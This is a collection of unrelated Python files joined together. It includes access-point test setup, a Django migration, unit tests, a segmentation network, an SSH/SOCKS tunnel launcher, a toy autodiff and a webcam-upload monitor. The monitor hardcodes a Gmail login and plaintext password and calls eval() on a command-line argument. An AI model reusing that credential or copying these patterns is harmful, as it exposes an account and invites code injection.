ap_cli_info = ssh_cli_active_fw(command_line_args)
ap_cli_fw = ap_cli_info['active_fw']
except Exception as ex:
print(ex)
logging.error(logging.traceback.format_exc())
ap_cli_info = "ERROR"
print("FAILED: Cannot Reach AP CLI.");
sys.exit(1)
fw_model = ap_cli_fw.partition("-")[0]
print('Current Active AP FW from CLI:', ap_cli_fw)
###Find Latest FW for Current AP Model and Get FW ID
############################################################################
#################### Create Report #########################################
############################################################################
# Create Report Folder for Today
today = str(date.today())
try:
os.mkdir(report_path + today)
except OSError:
print("Creation of the directory %s failed" % report_path)
else:
print("Successfully created the directory %s " % report_path)
logger.info('Report data can be found here: ' + report_path + today)
##Get Bearer Token to make sure its valid (long tests can require re-auth)
bearer = cloud.get_bearer(cloudSDK_url, cloud_type)
radius_name = "%s-%s-%s" % (command_line_args.testbed, fw_model, "Radius")
obj = CreateAPProfiles(command_line_args, cloud=cloud, client=client, fw_model=fw_model)
# Allow cmd-line to override
if command_line_args.psk_5g_wpa2:
obj.psk_data["5g"]["wpa2"]["name"] = command_line_args.psk_5g_wpa2
obj.psk_data["5g"]["wpa2"]["nat"] = command_line_args.psk_5g_wpa2
obj.psk_data["5g"]["wpa2"]["vlan"] = command_line_args.psk_5g_wpa2
if command_line_args.psk_5g_wpa:
obj.psk_data["5g"]["wpa"]["name"] = command_line_args.psk_5g_wpa
obj.psk_data["5g"]["wpa"]["nat"] = command_line_args.psk_5g_wpa
obj.psk_data["5g"]["wpa"]["vlan"] = command_line_args.psk_5g_wpa
if command_line_args.psk_2g_wpa2:
obj.psk_data["2g"]["wpa2"]["name"] = command_line_args.psk_2g_wpa2
obj.psk_data["2g"]["wpa2"]["nat"] = command_line_args.psk_2g_wpa2
obj.psk_data["2g"]["wpa2"]["vlan"] =command_line_args.psk_2g_wpa2
if command_line_args.psk_2g_wpa:
obj.psk_data["2g"]["wpa"]["name"] = command_line_args.psk_2g_wpa
obj.psk_data["2g"]["wpa"]["nat"] = command_line_args.psk_2g_wpa
obj.psk_data["2g"]["wpa"]["nat"] = command_line_args.psk_2g_wpa
if command_line_args.ssid_5g_wpa2:
obj.ssid_data["5g"]["wpa2"]["name"] = command_line_args.ssid_5g_wpa2
obj.ssid_data["5g"]["wpa2"]["nat"] = command_line_args.ssid_5g_wpa2
obj.ssid_data["5g"]["wpa2"]["vlan"] = command_line_args.ssid_5g_wpa2
if command_line_args.ssid_5g_wpa:
obj.ssid_data["5g"]["wpa"]["name"] = command_line_args.ssid_5g_wpa
obj.ssid_data["5g"]["wpa"]["nat"] = command_line_args.ssid_5g_wpa
obj.ssid_data["5g"]["wpa"]["vlan"] = command_line_args.ssid_5g_wpa
if command_line_args.ssid_2g_wpa2:
obj.ssid_data["2g"]["wpa2"]["name"] = command_line_args.ssid_2g_wpa2
obj.ssid_data["2g"]["wpa2"]["nat"] = command_line_args.ssid_2g_wpa2
obj.ssid_data["2g"]["wpa2"]["vlan"] = command_line_args.ssid_2g_wpa2
if command_line_args.ssid_2g_wpa:
obj.ssid_data["2g"]["wpa"]["name"] = command_line_args.ssid_2g_wpa
obj.ssid_data["2g"]["wpa"]["nat"] = command_line_args.ssid_2g_wpa
obj.ssid_data["2g"]["wpa"]["vlan"] = command_line_args.ssid_2g_wpa
print("creating Profiles")
ssid_template = "TipWlan-Cloud-Wifi"
if not command_line_args.skip_profiles:
if not command_line_args.skip_radius:
obj.create_radius_profile(radius_name, rid, key)
obj.create_ssid_profiles(ssid_template=ssid_template, skip_wpa2=command_line_args.skip_wpa2,
skip_wpa=command_line_args.skip_wpa, skip_eap=command_line_args.skip_radius)
print("Create AP with equipment-id: ", equipment_id)
obj.create_ap_bridge_profile(eq_id=equipment_id, fw_model=fw_model)
obj.validate_changes()
print("Profiles Created")
main()
|
from collections import deque
import random
class Queue:
def __init__ (self):
self._init ()
self._req_id = 0
self._consumed = 0
def qsize (self):
return len (self.q)
@property
def req_id (self):
req_id = self._req_id
self._req_id += 1
return req_id
def add (self, req):
self._add (req)
def first (self, req):
self._first (req)
def get (self):
try:
self._consumed += 1
return self._get ()
except IndexError:
return None
def _init (self):
self.q = deque ()
def _add (self, req):
self.q.append (req)
def _first (self, req):
self.q.append (req)
self.q.rotate (1)
def _get (self):
return self.q.popleft ()
class RandomQueue (Queue):
def _init (self):
self.q = []
def _add (self, req):
lq = len (self.q)
if lq == 0:
self.q.append (req)
else:
self.q.insert(random.randrange (lq), req)
def _first (self, req):
self.q.insert (0, req)
def _get (self):
return self.q.pop (0)
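# A small usage sketch (not part of the original module): Queue preserves FIFO order
# unless first() rotates a request to the front, while RandomQueue hands requests
# back in a shuffled order.
if __name__ == "__main__":
    q = Queue()
    for req in ("a", "b", "c"):
        q.add(req)
    q.first("urgent")
    print([q.get() for _ in range(q.qsize())])   # ['urgent', 'a', 'b', 'c']
    rq = RandomQueue()
    for req in ("a", "b", "c"):
        rq.add(req)
    print([rq.get() for _ in range(rq.qsize())])  # e.g. ['b', 'a', 'c']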
|
# Generated by Django 2.2 on 2020-11-05 01:23
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('user', '0052_auto_20201105_0026'),
]
operations = [
migrations.AddField(
model_name='user',
name='country_code',
field=models.CharField(blank=True, max_length=4, null=True),
),
]
|
from rdflib import Literal, URIRef
from rdflib.namespace import OWL, RDF, XSD
from client.model import (
Concept,
RDFDataset,
FeatureOfInterest,
Value,
Observation,
)
from client.model._TERN import TERN
# TODO: Confirm this testing is sufficient
def test_basic_rdf():
rdfdataset1 = RDFDataset()
foi1 = FeatureOfInterest(
Concept(),
rdfdataset1,
)
s1 = Observation(
rdfdataset1,
Value(),
foi1,
URIRef("https://example.com/simpleresult/x"),
URIRef("http://example.com/observedproperty/x"),
URIRef("http://example.com/instant/x"),
Literal("2001-01-01", datatype=XSD.date),
URIRef("https://example.com/procedure/x/"),
)
rdf = s1.to_graph()
assert (None, RDF.type, OWL.Class) not in rdf
    assert (None, RDF.type, TERN.Observation) in rdf
|
import unittest
import uuid
from requests import PreparedRequest, Response, Session
from unittest.mock import patch, Mock
from identixone.http.client import IdentixOneHttpClient
class TestHttpClientRequest(unittest.TestCase):
def setUp(self):
self.session_patch = patch('identixone.http.client.Session')
self.request_mock = Mock(wraps=PreparedRequest())
self.request_mock.headers = {}
self.session_mock = Mock(wraps=Session())
self.session_mock.prepare_request.return_value = self.request_mock
self.session_mock.send.return_value = Response()
self.session_mock.headers = {}
session_constructor_mock = self.session_patch.start()
session_constructor_mock.return_value = self.session_mock
self.auth_token = uuid.uuid4().hex
self.client = IdentixOneHttpClient(auth_token=self.auth_token)
def tearDown(self):
self.session_patch.stop()
def test_request_sets_common_headers(self):
self.client.request('method', 'URL')
assert self.client.session.headers['User-Agent'].startswith(
'identixone-python')
self.assertIsNotNone(self.client.session.headers['Request-ID'])
def test_set_accept_header_if_missing(self):
self.client.request('method', 'URL')
self.assertEqual(
'application/json', self.client.session.headers['Accept'])
def test_specify_accept_header_takes_effect(self):
self.client.request('method', 'URL', headers={'Accept': 'text/html'})
self.assertEqual('text/html', self.client.session.headers['Accept'])
|
def fcn_model(inputs, num_classes):
# Add Encoder Blocks.
# Remember that with each encoder layer, the depth of your model (the number of filters) increases.
print("Inputs shape:", inputs.shape, " \tImage Size in Pixels")
encoder01 = encoder_block(inputs, filters=32, strides=2)
print("encoder01 shape:", encoder01.shape, " \tEncoder Block 1")
encoder02 = encoder_block(encoder01, filters=64, strides=2)
print("encoder02 shape:", encoder02.shape, " \tEncoder Block 2")
encoder03 = encoder_block(encoder02, filters=128, strides=2)
print("encoder03 shape:", encoder03.shape, "\tEncoder Block 3")
# Add 1x1 Convolution layer using conv2d_batchnorm().
conv_1x1 = conv2d_batchnorm(encoder03, filters=256, kernel_size=1, strides=1)
print("conv_1x1 shape:", conv_1x1.shape, "\t1x1 Conv Layer")
# Add the same number of Decoder Blocks as the number of Encoder Blocks
decoder01 = decoder_block(conv_1x1, encoder02, filters=128)
print("decoder01 shape:", decoder01.shape, "\tDecoder Block 1")
decoder02 = decoder_block(decoder01, encoder01, filters=64)
print("decoder02 shape:", decoder02.shape, " \tDecoder Block 2")
decoder03 = decoder_block(decoder02, inputs, filters=32)
print("decoder03 shape:", decoder03.shape, "\tDecoder Block 3")
# The function returns the output layer of your model. "decoder03" is the final layer obtained from the last decoder_block()
# print("Outputs shape:", outputs.shape, "\tOutput Size in Pixel")
return layers.Conv2D(num_classes, 1, activation='softmax', padding='same')(decoder03)
def fcn_model(inputs, num_classes):
# TODO Add Encoder Blocks.
# Remember that with each encoder layer, the depth of your model (the number of filters) increases.
# conv2d 1st layer , input size is [,160,160,?]
encoder1 = encoder_block(inputs, 32, 2)
# conv2d 2nd layer, input size is [,80,80,32]
encoder2 = encoder_block(encoder1, 64, 2)
# conv2d 3rd layer, input size is [,40,40,64]
encoder3 = encoder_block(encoder2, 128, 2)
    # conv2d 4th layer, input size is [,20,20,128]
    encoder4 = encoder_block(encoder3, 256, 2)
    # now, the tensor size is [,10,10,256], next step is the 1x1 convolution layer
    # TODO Add 1x1 Convolution layer using conv2d_batchnorm().
    conv_1x1 = conv2d_batchnorm(encoder4, 256, 1, 1)
    # after the conv_1x1 step, the tensor size stays [,10,10,256]
    # TODO: Add the same number of Decoder Blocks as the number of Encoder Blocks,
    # pairing each decoder with the encoder output at the next larger resolution
    decoder0 = decoder_block(conv_1x1, encoder3, 256)
decoder1 = decoder_block(decoder0, encoder2, 128)
decoder2 = decoder_block(decoder1, encoder1, 64)
decoder3 = decoder_block(decoder2, inputs, 32)
# The function returns the output layer of your model. "x" is the final layer obtained from the last decoder_block()
return layers.Conv2D(num_classes, 1, activation='softmax', padding='same')(decoder3)
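# The helpers referenced above (encoder_block, decoder_block, conv2d_batchnorm) and the
# `layers` module are not defined in this snippet. A minimal sketch of what they might
# look like, assuming tf.keras layers and the common separable-conv encoder /
# upsample-and-concatenate decoder pattern; the actual project code may differ.
from tensorflow.keras import layers

def conv2d_batchnorm(input_layer, filters, kernel_size=3, strides=1):
    # Standard convolution followed by batch normalization.
    output_layer = layers.Conv2D(filters, kernel_size, strides=strides,
                                 padding='same', activation='relu')(input_layer)
    return layers.BatchNormalization()(output_layer)

def encoder_block(input_layer, filters, strides):
    # Depthwise-separable convolution that downsamples by `strides`.
    output_layer = layers.SeparableConv2D(filters, 3, strides=strides,
                                          padding='same', activation='relu')(input_layer)
    return layers.BatchNormalization()(output_layer)

def decoder_block(small_ip_layer, large_ip_layer, filters):
    # Upsample the deeper feature map, concatenate the skip connection, then refine.
    upsampled = layers.UpSampling2D((2, 2))(small_ip_layer)
    concatenated = layers.concatenate([upsampled, large_ip_layer])
    return conv2d_batchnorm(concatenated, filters)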
|
import os
import app
import json
def real_path(file_name):
return os.path.dirname(os.path.abspath(__file__)) + file_name
def main():
try:
config_file = real_path('/config/config.json')
config = json.loads(open(config_file).read())
tunnel_type = str(config['tunnel_type'])
inject_host = str(config['inject_host'])
inject_port = int(config['inject_port'])
socks5_port_list = app.filter_array(config['socks5_port_list'])
except KeyError: app.json_error(config_file); return
if len(socks5_port_list) == 0: socks5_port_list.append('1080')
log_connecting = True if len(socks5_port_list) > 1 else False
quiet = True if len(socks5_port_list) > 1 else False
app.server((inject_host, inject_port), quiet=quiet).start()
ssh_clients = app.ssh_clients((inject_host, inject_port), socks5_port_list, log_connecting=log_connecting)
ssh_clients.accounts = app.generate_accounts(app.convert_hostnames(real_path('/database/accounts.json')))
ssh_clients.start()
if __name__ == '__main__':
main()
|
from enum import Enum
from concrete_class.hi_active_cooling import HighActiveCooling
from concrete_class.med_active_cooling import MedActiveCooling
from concrete_class.passive_cooling import PassiveCooling
class CoolingType(Enum):
PASSIVE = PassiveCooling()
HIGH_ACTIVE = HighActiveCooling()
MED_ACTIVE = MedActiveCooling()
|
import os
from compas.geometry.transformations import translation
os.system("cls")
import os
import numpy as np
import compas.geometry as cg
from compas.geometry import Point
from compas.geometry import Vector
from compas.geometry import Plane
from compas.geometry import Line
from compas.geometry import Polyline
from compas.datastructures import Mesh
from compas_view2.app import App
from compas_view2.objects import Collection
import compas_view2.objects as w
from compas_wood.CGAL import connectionDetection
from compas_wood.data import joinery_solver_cross
from compas_wood.data import joinery_solver_sideside
from compas_wood.data import JoinerySolverTopSideDataSet
from compas_wood.data import joinery_solver_annen
from compas_wood.data import joinery_solver_plates
def DisplayLines(viewer, lines, scale=0.01):
linesScaled = []
for i in lines:
l = cg.Line(i[0]*scale,i[1]*scale)
linesScaled.append(l)
viewer.add(Collection(linesScaled),color = (0, 0, 0), linewidth = 2)
def DisplayPolylinesAsMesh(viewer, polylines, type, scale=0.01):
outPolylines = [[],[],[],[]]
outPolylinesColors = [
(255/255.0,0/255.0,0/255.0),
(255/255.0,165/255.0,0/255.0),
(200/255.0,200/255.0,200/255.0),
(8/255.0,96/255.0,168/255.0)
]
#0 Red Side-Side 1 Yellow Top-Side 2 Grey Top-Top 3 Blue Cross
for i in range (len(polylines)):
polyline = polylines[i]
polyline.transform(cg.transformations.scale.matrix_from_scale_factors([scale,scale,scale]))
        mesh = Mesh.from_polygons([polyline])
outPolylines[type[i]].append(mesh)
for i in range (len(outPolylines)):
#print(len(outPolylines[i]))
if(len(outPolylines[i])>0):
viewer.add(Collection(outPolylines[i]),color = outPolylinesColors[i],opacity=0.75)
def DisplayPolylines(viewer, polylines, scale=0.00,r = 0.0, g = 0.0, b = 0.0, t = 1, collection = True):
polylinesScaled = []
for i in polylines:
#print(i)
if(len(i)>1):
a = i.transformed(cg.transformations.scale.matrix_from_scale_factors([scale,scale,scale]))
polylinesScaled.append(a)
if collection==False:
if(len(i)==4):
viewer.add(a,color=(0,0,255),linewidth = 1)
elif(len(i)==2):
viewer.add(a,color=(0,255,0),linewidth =10)
else:
viewer.add(a,color=(r,g,b), linewidth = t)
if collection:
if(len(polylinesScaled)):
viewer.add(Collection(polylinesScaled),color=(r,g,b), linewidth = t)
else:
print("Nothing is displayed")
def DisplayPolyline(viewer, polyline, scale=0.01,r = 0.0, g = 0.0, b = 0.0, t = 1):
if(len(polyline)>1):
y = polyline.transformed(cg.transformations.scale.matrix_from_scale_factors([scale,scale,scale]))
viewer.add(y,color=(r,g,b), linewidth = t)
def test_connectionDetection():
# ==============================================================================
# Get a list of polyline pairs
# ==============================================================================
#input = PolylineDataSet.GetAnnenPolylineTwoPlates()
#for i in PolylineDataSet.GetAnnenPolylineTwoPlates():
# input.append(i.transformed(cg.transformations.Translation.from_vector(Vector(100, 0,0))))
#input = PolylineDataSet.GetAnnenPolyline()
#in-plane wrong - rotate correct
#input = JoinerySolverSideSideDataSet.SS24()#//0 7 Angles-14 FULL SET 14 // IN-PLANE 6 21, issues 3 - not detected 11,15,16 - strange offset, 21 - side-top not implemented
#input = JoinerySolverTopSideDataSet.TS8()#3 - errors with multiple connections, and flip for tenons, 7 - does not work
#input = PolylineDataSet.Test6()
#input = PolylineDataSet.TestCross14()#9 errors
#input = PolylineDataSet.TestChangeBasis()
# ==============================================================================
# GetConnectionZones
# ==============================================================================
input = joinery_solver_annen.annen_small_polylines()
"""
result = connectionDetection.GetConnectionZones(
input,
joinery_solver_annen.annen_small_edge_directions(),
joinery_solver_annen.annen_small_edge_joints(),
joinery_solver_annen.annen_small_three_valance_element_indices_and_instruction()
)
"""
#input = joinery_solver_sideside.SS26()
#input = joinery_solver_cross.TestCross9()#8
input = joinery_solver_sideside.SS12();
"""
input = joinery_solver_plates.ts_0_polylines()
result = connectionDetection.GetConnectionZones(
input,
joinery_solver_plates.ts_0_edge_directions()
)
"""
result = connectionDetection.GetConnectionZones(
input
)
# ==============================================================================
# Process output
# ==============================================================================
viewer = App(show_grid=False,width = 3840,height = 2160-250)
DisplayPolylines(viewer,input,0.01,0.5, 0.5, 0.5,1,True)
DisplayPolylines(viewer,result[0],0.01, 1.0, 0.0, 0.0,3,False)
viewer.run()
test_connectionDetection()
|
#!/usr/bin/env python3
# Yes, I am aware that I just switched from 2 spaces to 4 spaces. I installed linux on my desktop and this
# is the default formatting from vim, and also I remembered that it's the preferred tab-width for python.
# I am truly and deeply sorry if this has offended you. If you would like to seek financial compensation
# for this tradgedy, please email me at the address on my github profile, and I'll send you like...
# 5 cents, followed by seeking financial compensation for you seeking financial compensation from me...
import re
import sys
# get some regexes compiled:
node_re = re.compile(r'(\w+) \((\d+)\)')
relationship_re = re.compile(r'(\w+) \((\d+)\) -> (.+)')
if len(sys.argv) > 1:
infilename = sys.argv[1]
else:
infilename = 'input.txt'
parent_nodes = set()
child_nodes = set()
with open(infilename, 'r') as infile:
lines = [line.strip() for line in infile]
for line in lines:
if '->' not in line:
match = node_re.match(line)
child_nodes.add(match.group(1))
elif '->' in line:
match = relationship_re.match(line.strip())
parent_nodes.add(match.group(1))
children = [n.strip() for n in match.group(3).split(',')]
for child in children:
child_nodes.add(child)
print(parent_nodes - child_nodes)
|
import os
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.mime.application import MIMEApplication
import argparse
import schedule
import time
import datetime
import glob
# function to create directories
def create_dir(target_dir):
if not os.path.exists(target_dir):
try:
os.makedirs(target_dir)
except:
pass
# function to write records
def write_record(record_file,output):
with open(record_file,"a") as f:
f.write(output+' \n')
# function to read records
def read_record(record_file):
with open(record_file,"r") as f:
raw_video_ids = f.readlines()
final_video_ids = []
for video_id in raw_video_ids:
final_video_ids.append(video_id.split(" ")[0])
return final_video_ids
# helper function to create day folder
def create_day_folder(base_dir,system_date=None,setup=True):
if system_date == None:
dt_system_date = datetime.datetime.now()
else:
dt_system_date = datetime.datetime.strptime(system_date,'%Y-%m-%d')
year = str(dt_system_date.year)
month = str(dt_system_date.month)
day = str(dt_system_date.day)
day_folder = base_dir + '{}-{}-{}/'.format(year,month,day)
day_string = '{}-{}-{}'.format(year,month,day)
if setup:
create_dir(day_folder)
return day_folder, day_string
def send(user, password, to_list, subject, text, attachment_list=None):
# set up connection
smtp_host = 'smtp.gmail.com'
smtp_port = 587
smtp_connection = smtplib.SMTP(smtp_host,smtp_port) # initiate SMTP connection
smtp_connection.ehlo() # send an EHLO (Extended Hello) command
smtp_connection.starttls() # enable transport layer security (TLS) encryption
smtp_connection.login(user, password) # login
# write email
msg = MIMEMultipart()
msg['Subject'] = subject
msg.attach(MIMEText(text))
# attach files
if attachment_list is not None:
for attachment in attachment_list:
with open(attachment, 'rb') as f:
# Read in the attachment using MIMEApplication
file = MIMEApplication(f.read(),name=os.path.basename(attachment))
file['Content-Disposition'] = f'attachment;filename="{os.path.basename(attachment)}"'
# Add the attachment to our message object
msg.attach(file)
# send
smtp_connection.sendmail(from_addr=user,
to_addrs=to_list, msg=msg.as_string())
# close connection
smtp_connection.quit()
def check_and_record(upload_record,f_cloud_webcam_dir):
# read record file
try:
copied_videos = read_record(upload_record)
except:
write_record(upload_record,'')
copied_videos = read_record(upload_record)
last_record = copied_videos[-1]
if last_record == 'stop':
return False
elif last_record == '':
last_record = 0
next_record = 0.5
else:
last_record = float(last_record)
next_record = len(glob.glob(f_cloud_webcam_dir+'*.mp4'))
write_record(upload_record,str(next_record))
if next_record - last_record > 0:
return False
else:
return True
def check_and_send():
# check if there are any issues for each webcam
for webcam_id in webcam_ids:
webcam_dir = webcam_dirs[webcam_id]
cloud_webcam_dir = cloud_webcam_dirs[webcam_id]
upload_record = webcam_dir + 'email_record.txt'
issue = check_and_record(upload_record,cloud_webcam_dir)
# if not, we send an email
if issue:
send(user='hgselitlab2@gmail.com',
password='litlab2019',
to_list=['chng_weimingedwin@g.harvard.edu'],
subject='No new upload for {}_{}'.format(station_id,webcam_id),
text='',
attachment_list=["{}/hdd_nextcloud_sync.log".format(station_dir)])
write_record(upload_record,'stop')
"""----------------------------- options -----------------------------"""
parser = argparse.ArgumentParser(description='Email')
parser.add_argument('--station', type=int,
help='id for station')
parser.add_argument('--webcams', type=str,
help='list of ids for webcam')
parser.add_argument('--output_dir', type=str, default='../outputs/',
help='location of output drive')
parser.add_argument('--nextcloud_dir', type=str,
help='location of nextcloud drive')
parser.add_argument('--monitor_date', default=None,
help='which date to monitor, %Y-%m-%d')
args = parser.parse_args()
if __name__ == "__main__":
# create necessary variables
code_dir = os.getcwd() +'/'
station_id = args.station
webcam_ids = eval(args.webcams)
monitor_date = args.monitor_date
os.chdir(args.output_dir)
output_dir = os.getcwd() +'/'
os.chdir(args.nextcloud_dir)
nextcloud_dir = os.getcwd() +'/'
print('Next Cloud Directory - {}'.format(nextcloud_dir))
os.chdir(code_dir)
# create folders
station_dir = output_dir + 'station_{}/'.format(station_id)
cloud_day_folder, _ = create_day_folder(nextcloud_dir,system_date=monitor_date,setup=False)
webcam_dirs = {}
cloud_webcam_dirs = {}
for webcam_id in webcam_ids:
camera_id = '{}_{}'.format(station_id,webcam_id)
webcam_dir = station_dir + 'webcam_{}/'.format(webcam_id)
webcam_dirs[webcam_id] = webcam_dir
cloud_webcam_dir = cloud_day_folder + '{}/'.format(camera_id)
cloud_webcam_dirs[webcam_id] = cloud_webcam_dir
# schedule jobs
email_job = schedule.every(90).minutes.do(check_and_send)
# start scheduler
try:
while True:
schedule.run_pending()
time.sleep(1)
except KeyboardInterrupt:
print('\nEnding scheduler...')
|
# coding=utf-8
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import torch
import os
import pickle
import torchvision.models as models
import math
import numpy as np
import cv2
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
# a = torch.randn((1,2,9,9))
# print a
#
# b = torch.nn.functional.adaptive_max_pool2d(a, 3)
# print b
# b = Variable(torch.ones((3,2)), requires_grad=False)
# b[b<0] = 0
# print(b)
# model = torch.load('/home/rgh/PycharmProjects/pytorch-faster-rcnn/data/imagenet_weights/vgg16-00b39a1b.pth')
# print(model.keys())
# model = models.vgg16()
#
# b = torch.ones((3,2))
# c = b[:, 0]
# # c = b.new(b.size(0), 1) #.zero_()
# print(b)
# print(c.size())
# clss = torch.from_numpy(np.array([0,1,2]))
# bbox_targets = clss.new(clss.numel(), 4 * 3).zero_()
# bbox_target_data = torch.from_numpy(np.array([[-1,-2,-3,-4],[-1,-2,-3,-4],[-1,-2,-3,-4]]))
# inds = torch.from_numpy(np.array([1,2]))
#
# clss = clss[inds].contiguous().view(-1,1) # (n, 1)
# print(clss)
# dim1_inds = inds.unsqueeze(1).expand(inds.size(0), 4) # (n, 4) [ [1,1,1,1],[3,3,3,3],[4,4,4,4] ]
# print(dim1_inds)
# dim2_inds = torch.cat([4*clss, 4*clss+1, 4*clss+2, 4*clss+3], 1).long()
# print(dim2_inds)
# bbox_targets[dim1_inds, dim2_inds] = bbox_target_data[inds][:, 0:]
#
# scores = np.array([[1,2],[3,4],[5,6]])
# mask_target_channel = scores.argmax(1)
# print(mask_target_channel.shape)
# img = np.array([0.2,0.5])
# cv2.imwrite('/media/rgh/rgh-data/PycharmProjects/cvpr2018/temp/mask/test.png',img)
# result = np.zeros((3,3))
#
# mask_a = np.array([[1,0],[3,4]])
# index = result[0:2,0:2]==0
# result[0:2,0:2][index] = mask_a[index]
#
# mask_b = np.array([[100,101],[102,103]])
# index = result[0:2,0:2]==0
# result[0:2,0:2][index] = mask_b[index]
# print(result)
# print(bbox_targets)
# a = torch.from_numpy(np.array([[1,2,3],[4,8,6]]))
# b = a[0:1,:]
# print(b)
# b = a.new(2, 1).zero_()
# for i in range(2):
# b[i,:] = a[i,1]
# b[0][0] = 10
# print(a)
# x = np.ones((3,2))
# y = np.ones(3)
# print(x+y)
# overlaps = torch.from_numpy(np.array([[1,2,3],[4,8,6]]))
# gt_boxes = torch.from_numpy(np.array([[0,0,0,0,-1],[0,0,0,0,-2],[0,0,0,0,-3]]))
# max_overlaps, gt_assignment = overlaps.max(1)
# print(max_overlaps,gt_assignment)
# labels = gt_boxes[gt_assignment, [4]]
# print(labels)
# for key, value in dict(model.named_parameters()).items():
# print(key)
# obj2 = pickle.load(open(os.path.join('/home/rgh/PycharmProjects/pytorch-faster-rcnn/output/vgg16/lip_val/global_cat/vgg16_faster_rcnn_iter_70000',
# 'hair_pr.pkl'), 'rb'))
# print(obj2)
# a = torch.ones((256,512,37,39))
#
# b = torch.zeros((256,37,39))
# print(b.size())
# a = Variable(a)
# print(a.size())
# b = Variable(b)
# print(a*b)
# all_boxes = [[[3] for _ in range(2)]
# for _ in range(3)]
# all_boxes[0][0] = 10
# print(all_boxes)
# print(all_boxes[0][0][1])
# img = cv2.imread('/home/rgh/Pictures/temp/t.jpg')
# img = np.array(img)
# img = np.array([img])
# b = torch.from_numpy(img)
# b = b.float()
# b = b.permute(0, 3, 1, 2)
# print(b.size())
# # b has the size (1, 3, 360, 640)
# flow = torch.zeros(1, 420, 1002 , 2)
# b = Variable(b)
# flow = Variable(flow)
# out = F.grid_sample(b, flow)
# print(out.data.shape)
# img = out.data.numpy()
# print(img.shape)
# img = img.squeeze().transpose(1,2,0)
# cv2.imshow('g',img)
# cv2.waitKey()
# grads = {}
# def save_grad(name):
# def hook(grad):
# grads[name] = grad
# return hook
# x = Variable(torch.ones((2,2)), requires_grad=True)
#
# z = x * 2
# z[0,0] = 0
# z.register_hook(save_grad('z'))
# t = z+2
#
# t.backward(torch.Tensor([[10]]))
# print(x.grad,grads['z'])
# x = Variable(torch.ones(2, 2), requires_grad = True)
# w = Variable(torch.ones(2, 2), requires_grad = True)
# z = x*w -100
# loss = z.sum()
# loss.backward() # loss.backward(torch.Tensor([1]))
#
# print(x.grad)
# print(w.grad)
# grads = {}
# def save_grad(name):
# def hook(grad):
# grads[name] = grad
# return hook
#
# x = Variable(torch.ones((2,2)), requires_grad=True)
# y = Variable(torch.ones((1,2)), requires_grad=True)
# t = Variable(torch.ones((1,2)), requires_grad=True)
# t = x[0,:] + y
# t.register_hook(save_grad('t'))
# z = torch.cat((y, t),1)
# z = torch.cat((y, z),1)
# z.backward(torch.Tensor([[1, 2, 3, 4, 1,1]]))
# print(z, x.grad, y.grad, t.grad, grads['t'])
#
# z = x[0,0]
# z.backward(torch.Tensor([[10]]))
# print(z, x.grad, y.grad, t.grad)
# a = torch.ones((3,2))
# a[0,0] = 3
# print(a==3)
# a = np.array([[1,2],[3,4]])
# b = np.zeros((2,2,3))
# mask = a == 1
# c = b[mask]
# c[0][0] = -100
# print (c)
# print (b)
# d = a[mask]
# d [0] = -100
# print (d)
# print (a)
# a = np.array([[1,2],[3,4]])
# mask = a == 1
# b = a[mask]
# b = -100
# print (b)
# print (a)
# a[mask] = -100
# print (a)
# img_names = open('/media/rgh/rgh-data/Dataset/Lip_t_d_zdf/train_full.txt', 'r')
# total = []
# for name in img_names:
# name = name.strip()
# if name not in total:
# total.append(name)
# else:
# print(name)
# print (len(total))
class Vars(object):
def __init__(self):
self.count = 0
self.defs = {}
self.lookup = {}
def add(self, *v):
name = self.lookup.get(v, None)
print (v)
if name is None:
if v[0] == '+':
if v[1] == 0:
return v[2]
elif v[2] == 0:
return v[1]
elif v[0] == '*':
if v[1] == 1:
return v[2]
elif v[2] == 1:
return v[1]
elif v[1] == 0:
return 0
elif v[2] == 0:
return 0
self.count += 1
name = "v" + str(self.count)
self.defs[name] = v
self.lookup[v] = name
return name
def __getitem__(self, name):
return self.defs[name]
def __iter__(self):
        return iter(self.defs.items())
def diff(vars, acc, v, w):
if v == w:
return acc
v = vars[v]
if v[0] == 'input':
return 0
elif v[0] == "sin":
return diff(vars, vars.add("*", acc, vars.add("cos", v[1])), v[1], w)
elif v[0] == '+':
gx = diff(vars, acc, v[1], w)
gy = diff(vars, acc, v[2], w)
return vars.add("+", gx, gy)
elif v[0] == '*':
gx = diff(vars, vars.add("*", v[2], acc), v[1], w)
gy = diff(vars, vars.add("*", v[1], acc), v[2], w)
return vars.add("+", gx, gy)
raise NotImplementedError
def autodiff(vars, v, *wrt):
return tuple(diff(vars, 1, v, w) for w in wrt)
# z = (sin x) + (x * y)
vars = Vars()
x = vars.add("input",1)
#a= raw_input()
y = vars.add("input",2)
z = vars.add("+", vars.add("*",x,y),vars.add("sin",x))
a = input()
print (autodiff(vars, z, x, y))
for k, v in vars:
print (k, v)
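# Worked result for the example above: with z = x*y + sin(x),
#   dz/dx = y + cos(x)   (product rule on x*y plus the chain rule through sin)
#   dz/dy = x
# so autodiff(vars, z, x, y) returns two variable names: one whose definition is
# ("+", <y>, <cos(x)>) and one that is simply the name bound to x. The loop above
# then prints every definition recorded in vars.defs, including the intermediates
# created while differentiating.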
|
# container-service-extension
# Copyright (c) 2019 VMware, Inc. All Rights Reserved.
# SPDX-License-Identifier: BSD-2-Clause
"""Handles retrieving the correct broker/cluster to use during an operation."""
from container_service_extension.exceptions import ClusterNotFoundError
from container_service_extension.exceptions import CseDuplicateClusterError
from container_service_extension.exceptions import CseServerError
from container_service_extension.exceptions import PksClusterNotFoundError
from container_service_extension.exceptions import PksDuplicateClusterError
from container_service_extension.exceptions import PksServerError
from container_service_extension.logger import SERVER_LOGGER as LOGGER
import container_service_extension.ovdc_utils as ovdc_utils
from container_service_extension.pksbroker import PksBroker
from container_service_extension.pksbroker_manager import create_pks_context_for_all_accounts_in_org # noqa: E501
import container_service_extension.request_handlers.request_utils as req_utils
from container_service_extension.server_constants import K8S_PROVIDER_KEY
from container_service_extension.server_constants import K8sProvider
from container_service_extension.shared_constants import RequestKey
import container_service_extension.utils as utils
from container_service_extension.vcdbroker import VcdBroker
"""Handles retrieving the correct broker/cluster to use during an operation."""
def get_cluster_info(request_data, tenant_auth_token):
"""Get cluster details directly from cloud provider.
Logic of the method is as follows.
If 'ovdc' is present in the cluster spec,
choose the right broker (by identifying the k8s provider
(vcd|pks) defined for that ovdc) to do get_cluster operation.
else
Invoke set of all (vCD/PKS) brokers in the org to find the cluster
:return: a tuple of cluster information as dictionary and the broker
